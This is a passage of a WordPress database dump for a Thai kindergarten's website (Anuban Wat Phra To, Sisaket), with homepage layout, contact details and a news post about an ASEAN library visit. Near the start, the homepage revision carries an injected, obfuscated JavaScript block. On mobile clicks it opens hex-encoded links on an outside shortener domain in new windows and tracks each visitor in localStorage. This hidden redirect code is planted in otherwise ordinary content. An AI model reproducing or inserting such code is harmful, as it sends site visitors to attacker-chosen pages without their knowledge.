{\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 13:50:46','2025-06-27 06:50:46','',19,'http://watprato.ssk.in.th/?p=503',0,'revision','',0),
(504,1,'2025-06-27 14:07:13','2025-06-27 07:07:13','<!-- wp:image {\"id\":505,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-724x1024.jpg\" alt=\"\" class=\"wp-image-505\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":507,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508515966_122233488296202781_3641426539455570755_n-1024x726.jpg\" alt=\"\" class=\"wp-image-507\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":506,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508566839_122233488350202781_5291093760071081349_n-1024x726.jpg\" alt=\"\" class=\"wp-image-506\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":508,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509255489_122233488332202781_3849008079105916440_n-1024x726.jpg\" alt=\"\" class=\"wp-image-508\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":509,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509432476_122233488362202781_6256446827292890718_n-1024x726.jpg\" alt=\"\" class=\"wp-image-509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":511,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509561039_122233485938202781_5092953145952209112_n-1024x726.jpg\" alt=\"\" class=\"wp-image-511\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":510,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510004299_122233487084202781_6268732022722924528_n-1024x726.jpg\" alt=\"\" class=\"wp-image-510\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":512,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510905776_122233487132202781_8330824708694035019_n-1024x726.jpg\" alt=\"\" class=\"wp-image-512\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เมื่อวันที่ 17 มิถุนายน 2568 โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ พร้อมด้วยคณะรองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนได้ร่วมต้อนรับ ท่านดร.สุวิทย์ มังคละ รองอธิบดีกรมอาเซียน กระทรวงการต่างประเทศ พร้อมคณะ ที่ได้ให้เกียรติมาตรวจเยี่ยมห้องสมุดอาเซียน ซึ่งเป็นห้องสมุดแห่งที่ 44 ในโครงการห้องสมุดอาเซียน : 1 จังหวัด 1 โรงเรียน 1 ห้องสมุดอาเซียน เพื่อประชาชนและเยาวชนไทย ในพื้นที่ใกล้เคียงและยังเป็นแรงกระตุ้นให้เยาวชนและชุมชนพัฒนาไปสู่สังคมแห่งการเรียนรู้อย่างยั่งยืน','','publish','open','open','','%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88-17-%e0%b8%a1%e0%b8%b4%e0%b8%96%e0%b8%b8%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%99-2568-%e0%b9%82%e0%b8%a3','','','2025-06-27 14:07:53','2025-06-27 07:07:53','',0,'http://watprato.ssk.in.th/?p=504',0,'post','',0),
(505,1,'2025-06-27 14:06:24','2025-06-27 07:06:24','','510226912_122233485428202781_3363047737425267891_n','','inherit','open','closed','','510226912_122233485428202781_3363047737425267891_n','','','2025-06-27 14:06:24','2025-06-27 07:06:24','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n.jpg',0,'attachment','image/jpeg',0),
(506,1,'2025-06-27 14:06:52','2025-06-27 07:06:52','','508566839_122233488350202781_5291093760071081349_n','','inherit','open','closed','','508566839_122233488350202781_5291093760071081349_n','','','2025-06-27 14:06:52','2025-06-27 07:06:52','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508566839_122233488350202781_5291093760071081349_n.jpg',0,'attachment','image/jpeg',0),
(507,1,'2025-06-27 14:06:52','2025-06-27 07:06:52','','508515966_122233488296202781_3641426539455570755_n','','inherit','open','closed','','508515966_122233488296202781_3641426539455570755_n','','','2025-06-27 14:06:52','2025-06-27 07:06:52','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/508515966_122233488296202781_3641426539455570755_n.jpg',0,'attachment','image/jpeg',0),
(508,1,'2025-06-27 14:06:52','2025-06-27 07:06:52','','509255489_122233488332202781_3849008079105916440_n','','inherit','open','closed','','509255489_122233488332202781_3849008079105916440_n','','','2025-06-27 14:06:52','2025-06-27 07:06:52','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509255489_122233488332202781_3849008079105916440_n.jpg',0,'attachment','image/jpeg',0),
(509,1,'2025-06-27 14:06:52','2025-06-27 07:06:52','','509432476_122233488362202781_6256446827292890718_n','','inherit','open','closed','','509432476_122233488362202781_6256446827292890718_n','','','2025-06-27 14:06:52','2025-06-27 07:06:52','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509432476_122233488362202781_6256446827292890718_n.jpg',0,'attachment','image/jpeg',0),
(510,1,'2025-06-27 14:06:52','2025-06-27 07:06:52','','510004299_122233487084202781_6268732022722924528_n','','inherit','open','closed','','510004299_122233487084202781_6268732022722924528_n','','','2025-06-27 14:06:52','2025-06-27 07:06:52','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510004299_122233487084202781_6268732022722924528_n.jpg',0,'attachment','image/jpeg',0),
(511,1,'2025-06-27 14:06:52','2025-06-27 07:06:52','','509561039_122233485938202781_5092953145952209112_n','','inherit','open','closed','','509561039_122233485938202781_5092953145952209112_n','','','2025-06-27 14:06:52','2025-06-27 07:06:52','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/509561039_122233485938202781_5092953145952209112_n.jpg',0,'attachment','image/jpeg',0),
(512,1,'2025-06-27 14:06:58','2025-06-27 07:06:58','','510905776_122233487132202781_8330824708694035019_n','','inherit','open','closed','','510905776_122233487132202781_8330824708694035019_n','','','2025-06-27 14:06:58','2025-06-27 07:06:58','',504,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/510905776_122233487132202781_8330824708694035019_n.jpg',0,'attachment','image/jpeg',0),
(513,1,'2025-06-27 14:07:13','2025-06-27 07:07:13','<!-- wp:image {\"id\":505,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-724x1024.jpg\" alt=\"\" class=\"wp-image-505\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":507,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508515966_122233488296202781_3641426539455570755_n-1024x726.jpg\" alt=\"\" class=\"wp-image-507\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":506,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508566839_122233488350202781_5291093760071081349_n-1024x726.jpg\" alt=\"\" class=\"wp-image-506\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":508,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509255489_122233488332202781_3849008079105916440_n-1024x726.jpg\" alt=\"\" class=\"wp-image-508\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":509,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509432476_122233488362202781_6256446827292890718_n-1024x726.jpg\" alt=\"\" class=\"wp-image-509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":511,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509561039_122233485938202781_5092953145952209112_n-1024x726.jpg\" alt=\"\" class=\"wp-image-511\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":510,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510004299_122233487084202781_6268732022722924528_n-1024x726.jpg\" alt=\"\" class=\"wp-image-510\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":512,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510905776_122233487132202781_8330824708694035019_n-1024x726.jpg\" alt=\"\" class=\"wp-image-512\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เมื่อวันที่ 17 มิถุนายน 2568 โรงเรียนอนุบาลวัดพระโต นำโดย นายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ พร้อมด้วยคณะรองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนได้ร่วมต้อนรับ ท่านดร.สุวิทย์ มังคละ รองอธิบดีกรมอาเซียน กระทรวงการต่างประเทศ พร้อมคณะ ที่ได้ให้เกียรติมาตรวจเยี่ยมห้องสมุดอาเซียน ซึ่งเป็นห้องสมุดแห่งที่ 44 ในโครงการห้องสมุดอาเซียน : 1 จังหวัด 1 โรงเรียน 1 ห้องสมุดอาเซียน เพื่อประชาชนและเยาวชนไทย ในพื้นที่ใกล้เคียงและยังเป็นแรงกระตุ้นให้เยาวชนและชุมชนพัฒนาไปสู่สังคมแห่งการเรียนรู้อย่างยั่งยืน','','inherit','closed','closed','','504-revision-v1','','','2025-06-27 14:07:13','2025-06-27 07:07:13','',504,'http://watprato.ssk.in.th/?p=513',0,'revision','',0),
(514,1,'2025-06-27 14:14:01','2025-06-27 07:14:01','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":524,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/507733863_122233208372202781_4817239570500527554_n-1024x726.jpg\" alt=\"\" class=\"wp-image-524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":525,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508557200_122233205786202781_8640392528716628766_n-1024x726.jpg\" alt=\"\" class=\"wp-image-525\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":527,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508593390_122233208462202781_2021394309803679795_n-1024x726.jpg\" alt=\"\" class=\"wp-image-527\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":526,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508658382_122233208516202781_580202122741841251_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-526\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":528,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508690066_122233208312202781_1715080013664278025_n-1024x726.jpg\" alt=\"\" class=\"wp-image-528\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":529,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508778331_122233208414202781_4423758755946843051_n-1024x726.jpg\" alt=\"\" class=\"wp-image-529\"/></figure>\n<!-- 